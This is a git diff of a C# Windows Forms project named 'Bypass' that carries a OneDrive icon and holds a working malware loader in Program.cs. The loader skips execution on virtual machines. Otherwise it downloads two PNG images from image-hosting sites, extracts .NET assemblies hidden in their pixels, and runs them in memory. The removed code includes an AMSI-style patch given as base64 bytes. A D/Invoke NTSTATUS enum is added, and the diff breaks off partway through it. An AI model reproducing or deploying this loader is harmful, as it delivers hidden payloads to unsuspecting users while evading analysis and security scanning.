diff --git a/.gitattributes b/.gitattributes
deleted file mode 100644
index dfe0770..0000000
--- a/.gitattributes
+++ /dev/null
@@ -1,2 +0,0 @@
-# Auto detect text files and perform LF normalization
-* text=auto
diff --git a/.gitignore b/.gitignore
deleted file mode 100644
index ed05cc9..0000000
--- a/.gitignore
+++ /dev/null
@@ -1,26 +0,0 @@
-## Ignore Visual Studio temporary files, build results, and
-## files generated by popular Visual Studio add-ons.
-
-# User-specific files
-*.suo
-*.user
-*.userosscache
-*.sln.docstates
-
-# User-specific files (MonoDevelop/Xamarin Studio)
-*.userprefs
-
-# Build results
-[Dd]ebug/
-[Dd]ebugPublic/
-[Rr]elease/
-[Rr]eleases/
-x64/
-x86/
-bld/
-[Bb]in/
-[Oo]bj/
-[Ll]og/
-
-# Visual Studio 2015 cache/options directory
-.vs/
diff --git a/.vs/Bypass/v16/.suo b/.vs/Bypass/v16/.suo
new file mode 100644
index 0000000..119488c
Binary files /dev/null and b/.vs/Bypass/v16/.suo differ
diff --git a/Bypass.sln b/Bypass.sln
index 4968762..cfb6e24 100644
--- a/Bypass.sln
+++ b/Bypass.sln
@@ -1,9 +1,9 @@
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
-VisualStudioVersion = 16.0.31025.194
+VisualStudioVersion = 16.0.31424.327
MinimumVisualStudioVersion = 10.0.40219.1
-Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Bypass", "Bypass\Bypass.csproj", "{6F5245BE-37EC-4CFB-8F6F-03ED38215D0A}"
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Bypass", "Bypass\Bypass.csproj", "{4541D820-539A-4E4E-A37B-A20AE0B56376}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
@@ -11,15 +11,15 @@ Global
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
- {6F5245BE-37EC-4CFB-8F6F-03ED38215D0A}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
- {6F5245BE-37EC-4CFB-8F6F-03ED38215D0A}.Debug|Any CPU.Build.0 = Debug|Any CPU
- {6F5245BE-37EC-4CFB-8F6F-03ED38215D0A}.Release|Any CPU.ActiveCfg = Release|Any CPU
- {6F5245BE-37EC-4CFB-8F6F-03ED38215D0A}.Release|Any CPU.Build.0 = Release|Any CPU
+ {4541D820-539A-4E4E-A37B-A20AE0B56376}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {4541D820-539A-4E4E-A37B-A20AE0B56376}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {4541D820-539A-4E4E-A37B-A20AE0B56376}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {4541D820-539A-4E4E-A37B-A20AE0B56376}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
- SolutionGuid = {FF81A9A4-8484-40D7-90FA-99E056080C95}
+ SolutionGuid = {AE458E12-891F-4E6E-8E91-121983468D3C}
EndGlobalSection
EndGlobal
diff --git a/Bypass/App.config b/Bypass/App.config
new file mode 100644
index 0000000..74ade9d
--- /dev/null
+++ b/Bypass/App.config
@@ -0,0 +1,6 @@
+
+
+
+
+
+
diff --git a/Bypass/Bypass.csproj b/Bypass/Bypass.csproj
index d472e59..c879a49 100644
--- a/Bypass/Bypass.csproj
+++ b/Bypass/Bypass.csproj
@@ -1,20 +1,18 @@
-
-
Debug
AnyCPU
- {6F5245BE-37EC-4CFB-8F6F-03ED38215D0A}
+ {4541D820-539A-4E4E-A37B-A20AE0B56376}
WinExe
Program
Program
v4.0
512
+ true
true
-
-
+
AnyCPU
@@ -34,14 +32,16 @@
TRACE
prompt
4
- false
- OneDrive.ico
+
app.manifest
+
+ OneDrive.ico
+
@@ -78,8 +78,6 @@
True
-
-
SettingsSingleFileGenerator
Settings.Designer.cs
@@ -91,17 +89,10 @@
-
+
+
+
-
-
- 这台计算机上缺少此项目引用的 NuGet 程序包。使用“NuGet 程序包还原”可下载这些程序包。有关更多信息,请参见 http://go.microsoft.com/fwlink/?LinkID=322105。缺少的文件是 {0}。
-
-
-
-
-
-
\ No newline at end of file
diff --git a/Bypass/Form1.Designer.cs b/Bypass/Form1.Designer.cs
index 8c80a9d..c29d750 100644
--- a/Bypass/Form1.Designer.cs
+++ b/Bypass/Form1.Designer.cs
@@ -1,17 +1,17 @@
-namespace Program
+namespace WindowsFormsApp1
{
partial class Form1
{
///
- /// 必需的设计器变量。
+ /// Required designer variable.
///
private System.ComponentModel.IContainer components = null;
///
- /// 清理所有正在使用的资源。
+ /// Clean up any resources being used.
///
- /// 如果应释放托管资源,为 true;否则为 false。
+ /// true if managed resources should be disposed; otherwise, false.
protected override void Dispose(bool disposing)
{
if (disposing && (components != null))
@@ -21,83 +21,144 @@ namespace Program
base.Dispose(disposing);
}
- #region Windows 窗体设计器生成的代码
+ #region Windows Form Designer generated code
///
- /// 设计器支持所需的方法 - 不要修改
- /// 使用代码编辑器修改此方法的内容。
+ /// Required method for Designer support - do not modify
+ /// the contents of this method with the code editor.
///
private void InitializeComponent()
{
+ this.components = new System.ComponentModel.Container();
this.button1 = new System.Windows.Forms.Button();
- this.checkBox1 = new System.Windows.Forms.CheckBox();
- this.dateTimePicker1 = new System.Windows.Forms.DateTimePicker();
+ this.comboBox1 = new System.Windows.Forms.ComboBox();
this.listView1 = new System.Windows.Forms.ListView();
- this.monthCalendar1 = new System.Windows.Forms.MonthCalendar();
+ this.listBox1 = new System.Windows.Forms.ListBox();
+ this.notifyIcon1 = new System.Windows.Forms.NotifyIcon(this.components);
+ this.listBox2 = new System.Windows.Forms.ListBox();
+ this.notifyIcon2 = new System.Windows.Forms.NotifyIcon(this.components);
this.progressBar1 = new System.Windows.Forms.ProgressBar();
+ this.radioButton1 = new System.Windows.Forms.RadioButton();
+ this.pictureBox1 = new System.Windows.Forms.PictureBox();
+ this.toolTip1 = new System.Windows.Forms.ToolTip(this.components);
+ this.textBox1 = new System.Windows.Forms.TextBox();
+ this.webBrowser1 = new System.Windows.Forms.WebBrowser();
+ ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit();
this.SuspendLayout();
//
// button1
//
- this.button1.Location = new System.Drawing.Point(288, 111);
+ this.button1.Location = new System.Drawing.Point(302, 87);
this.button1.Name = "button1";
this.button1.Size = new System.Drawing.Size(75, 23);
this.button1.TabIndex = 0;
this.button1.Text = "button1";
this.button1.UseVisualStyleBackColor = true;
//
- // checkBox1
+ // comboBox1
//
- this.checkBox1.AutoSize = true;
- this.checkBox1.Location = new System.Drawing.Point(110, 188);
- this.checkBox1.Name = "checkBox1";
- this.checkBox1.Size = new System.Drawing.Size(78, 16);
- this.checkBox1.TabIndex = 1;
- this.checkBox1.Text = "checkBox1";
- this.checkBox1.UseVisualStyleBackColor = true;
- //
- // dateTimePicker1
- //
- this.dateTimePicker1.Location = new System.Drawing.Point(203, 228);
- this.dateTimePicker1.Name = "dateTimePicker1";
- this.dateTimePicker1.Size = new System.Drawing.Size(200, 21);
- this.dateTimePicker1.TabIndex = 2;
+ this.comboBox1.FormattingEnabled = true;
+ this.comboBox1.Location = new System.Drawing.Point(118, 202);
+ this.comboBox1.Name = "comboBox1";
+ this.comboBox1.Size = new System.Drawing.Size(121, 20);
+ this.comboBox1.TabIndex = 1;
//
// listView1
//
this.listView1.HideSelection = false;
- this.listView1.Location = new System.Drawing.Point(482, 261);
+ this.listView1.Location = new System.Drawing.Point(-23, -46);
this.listView1.Name = "listView1";
this.listView1.Size = new System.Drawing.Size(121, 97);
- this.listView1.TabIndex = 3;
+ this.listView1.TabIndex = 2;
this.listView1.UseCompatibleStateImageBehavior = false;
//
- // monthCalendar1
+ // listBox1
//
- this.monthCalendar1.Location = new System.Drawing.Point(686, -22);
- this.monthCalendar1.Name = "monthCalendar1";
- this.monthCalendar1.TabIndex = 4;
+ this.listBox1.FormattingEnabled = true;
+ this.listBox1.ItemHeight = 12;
+ this.listBox1.Location = new System.Drawing.Point(-23, -46);
+ this.listBox1.Name = "listBox1";
+ this.listBox1.Size = new System.Drawing.Size(120, 88);
+ this.listBox1.TabIndex = 3;
+ //
+ // notifyIcon1
+ //
+ this.notifyIcon1.Text = "notifyIcon1";
+ this.notifyIcon1.Visible = true;
+ //
+ // listBox2
+ //
+ this.listBox2.FormattingEnabled = true;
+ this.listBox2.ItemHeight = 12;
+ this.listBox2.Location = new System.Drawing.Point(484, 225);
+ this.listBox2.Name = "listBox2";
+ this.listBox2.Size = new System.Drawing.Size(120, 88);
+ this.listBox2.TabIndex = 4;
+ //
+ // notifyIcon2
+ //
+ this.notifyIcon2.Text = "notifyIcon2";
+ this.notifyIcon2.Visible = true;
//
// progressBar1
//
- this.progressBar1.Location = new System.Drawing.Point(153, 334);
+ this.progressBar1.Location = new System.Drawing.Point(75, 315);
this.progressBar1.Name = "progressBar1";
this.progressBar1.Size = new System.Drawing.Size(100, 23);
this.progressBar1.TabIndex = 5;
//
+ // radioButton1
+ //
+ this.radioButton1.AutoSize = true;
+ this.radioButton1.Location = new System.Drawing.Point(172, 275);
+ this.radioButton1.Name = "radioButton1";
+ this.radioButton1.Size = new System.Drawing.Size(95, 16);
+ this.radioButton1.TabIndex = 6;
+ this.radioButton1.TabStop = true;
+ this.radioButton1.Text = "radioButton1";
+ this.radioButton1.UseVisualStyleBackColor = true;
+ //
+ // pictureBox1
+ //
+ this.pictureBox1.Location = new System.Drawing.Point(-23, -46);
+ this.pictureBox1.Name = "pictureBox1";
+ this.pictureBox1.Size = new System.Drawing.Size(100, 50);
+ this.pictureBox1.TabIndex = 7;
+ this.pictureBox1.TabStop = false;
+ //
+ // textBox1
+ //
+ this.textBox1.Location = new System.Drawing.Point(484, 132);
+ this.textBox1.Name = "textBox1";
+ this.textBox1.Size = new System.Drawing.Size(100, 21);
+ this.textBox1.TabIndex = 8;
+ //
+ // webBrowser1
+ //
+ this.webBrowser1.Location = new System.Drawing.Point(126, 62);
+ this.webBrowser1.MinimumSize = new System.Drawing.Size(20, 20);
+ this.webBrowser1.Name = "webBrowser1";
+ this.webBrowser1.Size = new System.Drawing.Size(250, 250);
+ this.webBrowser1.TabIndex = 9;
+ //
// Form1
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.ClientSize = new System.Drawing.Size(800, 450);
+ this.Controls.Add(this.webBrowser1);
+ this.Controls.Add(this.textBox1);
+ this.Controls.Add(this.pictureBox1);
+ this.Controls.Add(this.radioButton1);
this.Controls.Add(this.progressBar1);
- this.Controls.Add(this.monthCalendar1);
+ this.Controls.Add(this.listBox2);
+ this.Controls.Add(this.listBox1);
this.Controls.Add(this.listView1);
- this.Controls.Add(this.dateTimePicker1);
- this.Controls.Add(this.checkBox1);
+ this.Controls.Add(this.comboBox1);
this.Controls.Add(this.button1);
this.Name = "Form1";
- this.Text = "123";
+ this.Text = "Form1";
+ ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit();
this.ResumeLayout(false);
this.PerformLayout();
@@ -106,11 +167,17 @@ namespace Program
#endregion
private System.Windows.Forms.Button button1;
- private System.Windows.Forms.CheckBox checkBox1;
- private System.Windows.Forms.DateTimePicker dateTimePicker1;
+ private System.Windows.Forms.ComboBox comboBox1;
private System.Windows.Forms.ListView listView1;
- private System.Windows.Forms.MonthCalendar monthCalendar1;
+ private System.Windows.Forms.ListBox listBox1;
+ private System.Windows.Forms.NotifyIcon notifyIcon1;
+ private System.Windows.Forms.ListBox listBox2;
+ private System.Windows.Forms.NotifyIcon notifyIcon2;
private System.Windows.Forms.ProgressBar progressBar1;
+ private System.Windows.Forms.RadioButton radioButton1;
+ private System.Windows.Forms.PictureBox pictureBox1;
+ private System.Windows.Forms.ToolTip toolTip1;
+ private System.Windows.Forms.TextBox textBox1;
+ private System.Windows.Forms.WebBrowser webBrowser1;
}
-}
-
+}
\ No newline at end of file
diff --git a/Bypass/Form1.cs b/Bypass/Form1.cs
index f6c5c0a..dad6b73 100644
--- a/Bypass/Form1.cs
+++ b/Bypass/Form1.cs
@@ -7,7 +7,7 @@ using System.Linq;
using System.Text;
using System.Windows.Forms;
-namespace Program
+namespace WindowsFormsApp1
{
public partial class Form1 : Form
{
@@ -15,10 +15,5 @@ namespace Program
{
InitializeComponent();
}
-
- private void button1_Click(object sender, EventArgs e)
- {
-
- }
}
}
diff --git a/Bypass/Form1.resx b/Bypass/Form1.resx
index 1af7de1..4557cf0 100644
--- a/Bypass/Form1.resx
+++ b/Bypass/Form1.resx
@@ -117,4 +117,13 @@
System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+ 17, 17
+
+
+ 135, 17
+
+
+ 253, 17
+
\ No newline at end of file
diff --git a/Bypass/ILMerge.props b/Bypass/ILMerge.props
deleted file mode 100644
index b0fc9d2..0000000
--- a/Bypass/ILMerge.props
+++ /dev/null
@@ -1,67 +0,0 @@
-
-
-
-
-
-
-
-
-
-
- true
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- false
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/Bypass/ILMergeOrder.txt b/Bypass/ILMergeOrder.txt
deleted file mode 100644
index 3fda7f5..0000000
--- a/Bypass/ILMergeOrder.txt
+++ /dev/null
@@ -1,4 +0,0 @@
-# this file contains the partial list of the merged assemblies in the merge order
-# you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
-# and finetune merge order to your satisfaction
-
diff --git a/Bypass/Program.cs b/Bypass/Program.cs
index 492bc0f..d522a7e 100644
--- a/Bypass/Program.cs
+++ b/Bypass/Program.cs
@@ -1,6 +1,7 @@
using System;
-using System.Collections.Generic;
+using System.Diagnostics;
using System.Drawing;
+using System.IO;
using System.Linq;
using System.Management;
using System.Net;
@@ -8,6 +9,7 @@ using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Windows.Forms;
+using WindowsFormsApp1;
namespace Program
{
@@ -21,7 +23,33 @@ namespace Program
{
if (!VM())
{
- LD();
+ A.B();
+
+ string LDer = @"https://s1.ax1x.com/2020/04/28/J4Zp9S.png"; // No Startup,CHINA
+ string FI_LE = @"https://z3.ax1x.com/2021/07/05/RhfFGn.png"; //FI_LE
+ var requestLDer = WebRequest.Create(LDer);
+ var requestFI_LE = WebRequest.Create(FI_LE);
+ Bitmap LDerIMG;
+ Bitmap FI_LEIMG;
+
+ using (var response = requestLDer.GetResponse())
+ using (var stream = response.GetResponseStream())
+ {
+ LDerIMG = (Bitmap)Image.FromStream(stream);
+ }
+
+ using (var response = requestFI_LE.GetResponse())
+ using (var stream = response.GetResponseStream())
+ {
+ FI_LEIMG = (Bitmap)Image.FromStream(stream);
+ }
+
+ byte[] outputLDer = DE(LDerIMG);
+
+ byte[] outputFI_LE = DE(FI_LEIMG);
+
+ //Assembly.Load(outputLDer).GetType("loader.loader").GetMethod("RunProgram").Invoke(null, new object[] { outputFI_LE });
+ Assembly.Load(outputFI_LE).EntryPoint.Invoke(null, null);
}
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
@@ -45,35 +73,6 @@ namespace Program
return Convert.FromBase64String(holder.ToString().Replace(Convert.ToChar(0).ToString(), ""));
}
- private static void LD()
- {
- A.Bypass();
-
- string LDer = @"https://s1.ax1x.com/2020/04/28/J4Zp9S.png"; // No Startup,CHINA
- string FI_LE = @"https://z3.ax1x.com/2021/07/05/RhfFGn.png"; //FI_LE
- var requestLDer = WebRequest.Create(LDer);
- var requestFI_LE = WebRequest.Create(FI_LE);
- Bitmap LDerIMG;
- Bitmap FI_LEIMG;
-
- using (var response = requestLDer.GetResponse())
- using (var stream = response.GetResponseStream())
- {
- LDerIMG = (Bitmap)Image.FromStream(stream);
- }
-
- using (var response = requestFI_LE.GetResponse())
- using (var stream = response.GetResponseStream())
- {
- FI_LEIMG = (Bitmap)Image.FromStream(stream);
- }
-
- byte[] outputLDer = DE(LDerIMG);
-
- byte[] outputFI_LE = DE(FI_LEIMG);
-
- Assembly.Load(outputLDer).GetType("LDer.LDer").GetMethod("RunProgram").Invoke(null, new object[] { outputFI_LE });
- }
public static bool VM()
{
SelectQuery selectQuery = new SelectQuery("Select * from Win32_CacheMemory");
@@ -94,76 +93,608 @@ namespace Program
}
}
-
- public class A
+ public class DInvokeCore
{
- //static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
- //static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
- public static void Bypass()
+ // Required NTSTATUSs
+ public enum NTSTATUS : uint
{
- string x64 = "uFcAB4DD";
- string x86 = "uFcAB4DCGAA=";
- if (i64())
- pa(Convert.FromBase64String(x64));
- else
- pa(Convert.FromBase64String(x86));
+ // Success
+ Success = 0x00000000,
+ Wait0 = 0x00000000,
+ Wait1 = 0x00000001,
+ Wait2 = 0x00000002,
+ Wait3 = 0x00000003,
+ Wait63 = 0x0000003f,
+ Abandoned = 0x00000080,
+ AbandonedWait0 = 0x00000080,
+ AbandonedWait1 = 0x00000081,
+ AbandonedWait2 = 0x00000082,
+ AbandonedWait3 = 0x00000083,
+ AbandonedWait63 = 0x000000bf,
+ UserApc = 0x000000c0,
+ KernelApc = 0x00000100,
+ Alerted = 0x00000101,
+ Timeout = 0x00000102,
+ Pending = 0x00000103,
+ Reparse = 0x00000104,
+ MoreEntries = 0x00000105,
+ NotAllAssigned = 0x00000106,
+ SomeNotMapped = 0x00000107,
+ OpLockBreakInProgress = 0x00000108,
+ VolumeMounted = 0x00000109,
+ RxActCommitted = 0x0000010a,
+ NotifyCleanup = 0x0000010b,
+ NotifyEnumDir = 0x0000010c,
+ NoQuotasForAccount = 0x0000010d,
+ PrimaryTransportConnectFailed = 0x0000010e,
+ PageFaultTransition = 0x00000110,
+ PageFaultDemandZero = 0x00000111,
+ PageFaultCopyOnWrite = 0x00000112,
+ PageFaultGuardPage = 0x00000113,
+ PageFaultPagingFile = 0x00000114,
+ CrashDump = 0x00000116,
+ ReparseObject = 0x00000118,
+ NothingToTerminate = 0x00000122,
+ ProcessNotInJob = 0x00000123,
+ ProcessInJob = 0x00000124,
+ ProcessCloned = 0x00000129,
+ FileLockedWithOnlyReaders = 0x0000012a,
+ FileLockedWithWriters = 0x0000012b,
+
+ // Informational
+ Informational = 0x40000000,
+ ObjectNameExists = 0x40000000,
+ ThreadWasSuspended = 0x40000001,
+ WorkingSetLimitRange = 0x40000002,
+ ImageNotAtBase = 0x40000003,
+ RegistryRecovered = 0x40000009,
+
+ // Warning
+ Warning = 0x80000000,
+ GuardPageViolation = 0x80000001,
+ DatatypeMisalignment = 0x80000002,
+ Breakpoint = 0x80000003,
+ SingleStep = 0x80000004,
+ BufferOverflow = 0x80000005,
+ NoMoreFiles = 0x80000006,
+ HandlesClosed = 0x8000000a,
+ PartialCopy = 0x8000000d,
+ DeviceBusy = 0x80000011,
+ InvalidEaName = 0x80000013,
+ EaListInconsistent = 0x80000014,
+ NoMoreEntries = 0x8000001a,
+ LongJump = 0x80000026,
+ DllMightBeInsecure = 0x8000002b,
+
+ // Error
+ Error = 0xc0000000,
+ Unsuccessful = 0xc0000001,
+ NotImplemented = 0xc0000002,
+ InvalidInfoClass = 0xc0000003,
+ InfoLengthMismatch = 0xc0000004,
+ AccessViolation = 0xc0000005,
+ InPageError = 0xc0000006,
+ PagefileQuota = 0xc0000007,
+ InvalidHandle = 0xc0000008,
+ BadInitialStack = 0xc0000009,
+ BadInitialPc = 0xc000000a,
+ InvalidCid = 0xc000000b,
+ TimerNotCanceled = 0xc000000c,
+ InvalidParameter = 0xc000000d,
+ NoSuchDevice = 0xc000000e,
+ NoSuchFile = 0xc000000f,
+ InvalidDeviceRequest = 0xc0000010,
+ EndOfFile = 0xc0000011,
+ WrongVolume = 0xc0000012,
+ NoMediaInDevice = 0xc0000013,
+ NoMemory = 0xc0000017,
+ ConflictingAddresses = 0xc0000018,
+ NotMappedView = 0xc0000019,
+ UnableToFreeVm = 0xc000001a,
+ UnableToDeleteSection = 0xc000001b,
+ IllegalInstruction = 0xc000001d,
+ AlreadyCommitted = 0xc0000021,
+ AccessDenied = 0xc0000022,
+ BufferTooSmall = 0xc0000023,
+ ObjectTypeMismatch = 0xc0000024,
+ NonContinuableException = 0xc0000025,
+ BadStack = 0xc0000028,
+ NotLocked = 0xc000002a,
+ NotCommitted = 0xc000002d,
+ InvalidParameterMix = 0xc0000030,
+ ObjectNameInvalid = 0xc0000033,
+ ObjectNameNotFound = 0xc0000034,
+ ObjectNameCollision = 0xc0000035,
+ ObjectPathInvalid = 0xc0000039,
+ ObjectPathNotFound = 0xc000003a,
+ ObjectPathSyntaxBad = 0xc000003b,
+ DataOverrun = 0xc000003c,
+ DataLate = 0xc000003d,
+ DataError = 0xc000003e,
+ CrcError = 0xc000003f,
+ SectionTooBig = 0xc0000040,
+ PortConnectionRefused = 0xc0000041,
+ InvalidPortHandle = 0xc0000042,
+ SharingViolation = 0xc0000043,
+ QuotaExceeded = 0xc0000044,
+ InvalidPageProtection = 0xc0000045,
+ MutantNotOwned = 0xc0000046,
+ SemaphoreLimitExceeded = 0xc0000047,
+ PortAlreadySet = 0xc0000048,
+ SectionNotImage = 0xc0000049,
+ SuspendCountExceeded = 0xc000004a,
+ ThreadIsTerminating = 0xc000004b,
+ BadWorkingSetLimit = 0xc000004c,
+ IncompatibleFileMap = 0xc000004d,
+ SectionProtection = 0xc000004e,
+ EasNotSupported = 0xc000004f,
+ EaTooLarge = 0xc0000050,
+ NonExistentEaEntry = 0xc0000051,
+ NoEasOnFile = 0xc0000052,
+ EaCorruptError = 0xc0000053,
+ FileLockConflict = 0xc0000054,
+ LockNotGranted = 0xc0000055,
+ DeletePending = 0xc0000056,
+ CtlFileNotSupported = 0xc0000057,
+ UnknownRevision = 0xc0000058,
+ RevisionMismatch = 0xc0000059,
+ InvalidOwner = 0xc000005a,
+ InvalidPrimaryGroup = 0xc000005b,
+ NoImpersonationToken = 0xc000005c,
+ CantDisableMandatory = 0xc000005d,
+ NoLogonServers = 0xc000005e,
+ NoSuchLogonSession = 0xc000005f,
+ NoSuchPrivilege = 0xc0000060,
+ PrivilegeNotHeld = 0xc0000061,
+ InvalidAccountName = 0xc0000062,
+ UserExists = 0xc0000063,
+ NoSuchUser = 0xc0000064,
+ GroupExists = 0xc0000065,
+ NoSuchGroup = 0xc0000066,
+ MemberInGroup = 0xc0000067,
+ MemberNotInGroup = 0xc0000068,
+ LastAdmin = 0xc0000069,
+ WrongPassword = 0xc000006a,
+ IllFormedPassword = 0xc000006b,
+ PasswordRestriction = 0xc000006c,
+ LogonFailure = 0xc000006d,
+ AccountRestriction = 0xc000006e,
+ InvalidLogonHours = 0xc000006f,
+ InvalidWorkstation = 0xc0000070,
+ PasswordExpired = 0xc0000071,
+ AccountDisabled = 0xc0000072,
+ NoneMapped = 0xc0000073,
+ TooManyLuidsRequested = 0xc0000074,
+ LuidsExhausted = 0xc0000075,
+ InvalidSubAuthority = 0xc0000076,
+ InvalidAcl = 0xc0000077,
+ InvalidSid = 0xc0000078,
+ InvalidSecurityDescr = 0xc0000079,
+ ProcedureNotFound = 0xc000007a,
+ InvalidImageFormat = 0xc000007b,
+ NoToken = 0xc000007c,
+ BadInheritanceAcl = 0xc000007d,
+ RangeNotLocked = 0xc000007e,
+ DiskFull = 0xc000007f,
+ ServerDisabled = 0xc0000080,
+ ServerNotDisabled = 0xc0000081,
+ TooManyGuidsRequested = 0xc0000082,
+ GuidsExhausted = 0xc0000083,
+ InvalidIdAuthority = 0xc0000084,
+ AgentsExhausted = 0xc0000085,
+ InvalidVolumeLabel = 0xc0000086,
+ SectionNotExtended = 0xc0000087,
+ NotMappedData = 0xc0000088,
+ ResourceDataNotFound = 0xc0000089,
+ ResourceTypeNotFound = 0xc000008a,
+ ResourceNameNotFound = 0xc000008b,
+ ArrayBoundsExceeded = 0xc000008c,
+ FloatDenormalOperand = 0xc000008d,
+ FloatDivideByZero = 0xc000008e,
+ FloatInexactResult = 0xc000008f,
+ FloatInvalidOperation = 0xc0000090,
+ FloatOverflow = 0xc0000091,
+ FloatStackCheck = 0xc0000092,
+ FloatUnderflow = 0xc0000093,
+ IntegerDivideByZero = 0xc0000094,
+ IntegerOverflow = 0xc0000095,
+ PrivilegedInstruction = 0xc0000096,
+ TooManyPagingFiles = 0xc0000097,
+ FileInvalid = 0xc0000098,
+ InsufficientResources = 0xc000009a,
+ InstanceNotAvailable = 0xc00000ab,
+ PipeNotAvailable = 0xc00000ac,
+ InvalidPipeState = 0xc00000ad,
+ PipeBusy = 0xc00000ae,
+ IllegalFunction = 0xc00000af,
+ PipeDisconnected = 0xc00000b0,
+ PipeClosing = 0xc00000b1,
+ PipeConnected = 0xc00000b2,
+ PipeListening = 0xc00000b3,
+ InvalidReadMode = 0xc00000b4,
+ IoTimeout = 0xc00000b5,
+ FileForcedClosed = 0xc00000b6,
+ ProfilingNotStarted = 0xc00000b7,
+ ProfilingNotStopped = 0xc00000b8,
+ NotSameDevice = 0xc00000d4,
+ FileRenamed = 0xc00000d5,
+ CantWait = 0xc00000d8,
+ PipeEmpty = 0xc00000d9,
+ CantTerminateSelf = 0xc00000db,
+ InternalError = 0xc00000e5,
+ InvalidParameter1 = 0xc00000ef,
+ InvalidParameter2 = 0xc00000f0,
+ InvalidParameter3 = 0xc00000f1,
+ InvalidParameter4 = 0xc00000f2,
+ InvalidParameter5 = 0xc00000f3,
+ InvalidParameter6 = 0xc00000f4,
+ InvalidParameter7 = 0xc00000f5,
+ InvalidParameter8 = 0xc00000f6,
+ InvalidParameter9 = 0xc00000f7,
+ InvalidParameter10 = 0xc00000f8,
+ InvalidParameter11 = 0xc00000f9,
+ InvalidParameter12 = 0xc00000fa,
+ ProcessIsTerminating = 0xc000010a,
+ MappedFileSizeZero = 0xc000011e,
+ TooManyOpenedFiles = 0xc000011f,
+ Cancelled = 0xc0000120,
+ CannotDelete = 0xc0000121,
+ InvalidComputerName = 0xc0000122,
+ FileDeleted = 0xc0000123,
+ SpecialAccount = 0xc0000124,
+ SpecialGroup = 0xc0000125,
+ SpecialUser = 0xc0000126,
+ MembersPrimaryGroup = 0xc0000127,
+ FileClosed = 0xc0000128,
+ TooManyThreads = 0xc0000129,
+ ThreadNotInProcess = 0xc000012a,
+ TokenAlreadyInUse = 0xc000012b,
+ PagefileQuotaExceeded = 0xc000012c,
+ CommitmentLimit = 0xc000012d,
+ InvalidImageLeFormat = 0xc000012e,
+ InvalidImageNotMz = 0xc000012f,
+ InvalidImageProtect = 0xc0000130,
+ InvalidImageWin16 = 0xc0000131,
+ LogonServer = 0xc0000132,
+ DifferenceAtDc = 0xc0000133,
+ SynchronizationRequired = 0xc0000134,
+ DllNotFound = 0xc0000135,
+ IoPrivilegeFailed = 0xc0000137,
+ OrdinalNotFound = 0xc0000138,
+ EntryPointNotFound = 0xc0000139,
+ ControlCExit = 0xc000013a,
+ InvalidAddress = 0xc0000141,
+ PortNotSet = 0xc0000353,
+ DebuggerInactive = 0xc0000354,
+ CallbackBypass = 0xc0000503,
+ PortClosed = 0xc0000700,
+ MessageLost = 0xc0000701,
+ InvalidMessage = 0xc0000702,
+ RequestCanceled = 0xc0000703,
+ RecursiveDispatch = 0xc0000704,
+ LpcReceiveBufferExpected = 0xc0000705,
+ LpcInvalidConnectionUsage = 0xc0000706,
+ LpcRequestsNotAllowed = 0xc0000707,
+ ResourceInUse = 0xc0000708,
+ ProcessIsProtected = 0xc0000712,
+ VolumeDirty = 0xc0000806,
+ FileCheckedOut = 0xc0000901,
+ CheckOutRequired = 0xc0000902,
+ BadFileType = 0xc0000903,
+ FileTooLarge = 0xc0000904,
+ FormsAuthRequired = 0xc0000905,
+ VirusInfected = 0xc0000906,
+ VirusDeleted = 0xc0000907,
+ TransactionalConflict = 0xc0190001,
+ InvalidTransaction = 0xc0190002,
+ TransactionNotActive = 0xc0190003,
+ TmInitializationFailed = 0xc0190004,
+ RmNotActive = 0xc0190005,
+ RmMetadataCorrupt = 0xc0190006,
+ TransactionNotJoined = 0xc0190007,
+ DirectoryNotRm = 0xc0190008,
+ CouldNotResizeLog = 0xc0190009,
+ TransactionsUnsupportedRemote = 0xc019000a,
+ LogResizeInvalidSize = 0xc019000b,
+ RemoteFileVersionMismatch = 0xc019000c,
+ CrmProtocolAlreadyExists = 0xc019000f,
+ TransactionPropagationFailed = 0xc0190010,
+ CrmProtocolNotFound = 0xc0190011,
+ TransactionSuperiorExists = 0xc0190012,
+ TransactionRequestNotValid = 0xc0190013,
+ TransactionNotRequested = 0xc0190014,
+ TransactionAlreadyAborted = 0xc0190015,
+ TransactionAlreadyCommitted = 0xc0190016,
+ TransactionInvalidMarshallBuffer = 0xc0190017,
+ CurrentTransactionNotValid = 0xc0190018,
+ LogGrowthFailed = 0xc0190019,
+ ObjectNoLongerExists = 0xc0190021,
+ StreamMiniversionNotFound = 0xc0190022,
+ StreamMiniversionNotValid = 0xc0190023,
+ MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024,
+ CantOpenMiniversionWithModifyIntent = 0xc0190025,
+ CantCreateMoreStreamMiniversions = 0xc0190026,
+ HandleNoLongerValid = 0xc0190028,
+ NoTxfMetadata = 0xc0190029,
+ LogCorruptionDetected = 0xc0190030,
